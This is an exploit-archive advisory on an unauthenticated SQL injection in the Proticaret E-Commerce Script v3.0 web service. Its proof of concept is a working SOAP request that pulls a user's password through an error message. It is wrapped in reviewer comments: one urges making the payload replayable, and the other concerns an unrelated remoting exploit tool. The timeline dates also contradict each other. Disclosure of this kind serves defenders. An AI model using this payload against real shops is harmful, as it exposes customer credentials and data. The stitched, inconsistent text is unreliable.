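Review bot: the option list spells the switches `--usecom` and `--useser` (double dash) while the worked examples use `-usecom` and `-useser` (single dash); make them agree with what the option parser actually accepts, or readers will copy the wrong one. The command table entry "display stdou t" is broken across two lines and should read "display stdout". "If you get an exception it might be fixed with CVE-2014-1806" should say the server may already have the fix for CVE-2014-1806 applied, since the CVE names the bug, not the patch. The walkthrough would also benefit from one sentence on the return path: `-p` and `-i` open a local TCP port or named pipe for the back-channel, so the target must be able to connect back to the attacking host, and the DCOM fallback, as the text itself notes, normally only works locally; that is the first thing to check when `ver` hangs instead of failing.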

platforms/xml/webapps/35275.txt Executable file

@ -0,0 +1,124 @@
Document Title:
============
Proticaret E-Commerce Script v3.0 >= SQL Injection
Release Date:
===========
13 Nov 2014
Product & Service Introduction:
========================
Proticaret is a free e-commerce script.
Abstract Advisory Information:
=======================
BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0
Vulnerability Disclosure Timeline:
=========================
20 Oct 2014 : Contact with Vendor
20 Nov 2014 : Vendor Response
June 26, 2014 : Patch Released
13 Nov 2014 : Public Disclosure
Discovery Status:
=============
Published
Affected Product(s):
===============
Promist Bilgi ?leti?im Teknolojileri A.?
Product: Proticaret E-commerce Script v3.0 >=
Exploitation Technique:
==================
Remote, Unauthenticated
Severity Level:
===========
Critical
Technical Details & Description:
========================
SQL Injection
Proof of Concept (PoC):
==================
Proof of Concept
Request:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:GetProductCodes>
<!--Optional:-->
<tem:Code>1' from Users where (select top 1 password from users where userId=101)>1- -</tem:Code>
<!--Optional:-->
<tem:StartWith>?</tem:StartWith>
</tem:GetProductCodes>
</soapenv:Body>
</soapenv:Envelope>
Response:
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<soap:Fault>
<faultcode>soap:Server</faultcode>
<faultstring>System.Web.Services.Protocols.SoapException: Server
was unable to process request. --->
System.Data.SqlClient.SqlException: Conversion failed when converting
the nvarchar value 'secretpassword' to data type int.
at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException
exception, Boolean breakConnection, Action`1 wrapCloseInAction)
at
System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject
stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)
at
System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior,
SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet
bulkCopyHandler, TdsParserStateObject stateObj, Boolean&
dataReady)
at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows)
at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more)
at System.Data.SqlClient.SqlDataReader.Read()
at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith)
--- End of inner exception stack trace ---</faultstring>
<detail/>
</soap:Fault>
</soap:Body>
</soap:Envelope>
Solution Fix & Patch:
================
Apply the patch for v3.0
Security Risk:
==========
The risk of the vulnerabilities above estimated as critical.
Credits & Authors:
==============
Bilgi Güvenli?i Akademisi
Disclaimer & Information:
===================
The
information provided in this advisory is provided as it is without any
warranty. BGA disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a
particular purpose. BGA or its suppliers are not liable in any case of
damage, including direct, indirect, incidental, consequential loss of
business profits or special damages.
Domain: www.bga.com.tr
Social: twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2014 | BGA
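Review bot: the disclosure timeline is internally impossible: "June 26, 2014 : Patch Released" precedes "20 Oct 2014 : Contact with Vendor", and "20 Nov 2014 : Vendor Response" falls after both the 13 Nov release date and the 13 Nov public disclosure, so at least two of the four dates are wrong. The proof of concept shows only a SOAP body; add the endpoint it was posted to and the `SOAPAction` header for `GetProductCodes`, because without them the request cannot be replayed. Inside `<tem:Code>` the comment terminator is written `- -` with a space, and SQL Server only treats `--` as a comment, so either that is a transcription error or the payload worked for another reason; the file should carry the exact bytes that produced the `Conversion failed when converting the nvarchar value 'secretpassword' to data type int` fault shown in the response (that fault is what makes this error-based extraction of the `Users.password` column, which is worth stating in Technical Details instead of the bare words "SQL Injection"). "v3.0 >=" in the title and in Affected Product(s) is ambiguous between "3.0 and later" and "up to 3.0"; given "Apply the patch for v3.0" it presumably means 3.0 and earlier unpatched builds, and the range should be written that way. The duplicated "Proof of Concept" heading and the mis-encoded Turkish characters in "Promist Bilgi ?leti?im Teknolojileri A.?" and "Bilgi Güvenli?i Akademisi" should also be cleaned up.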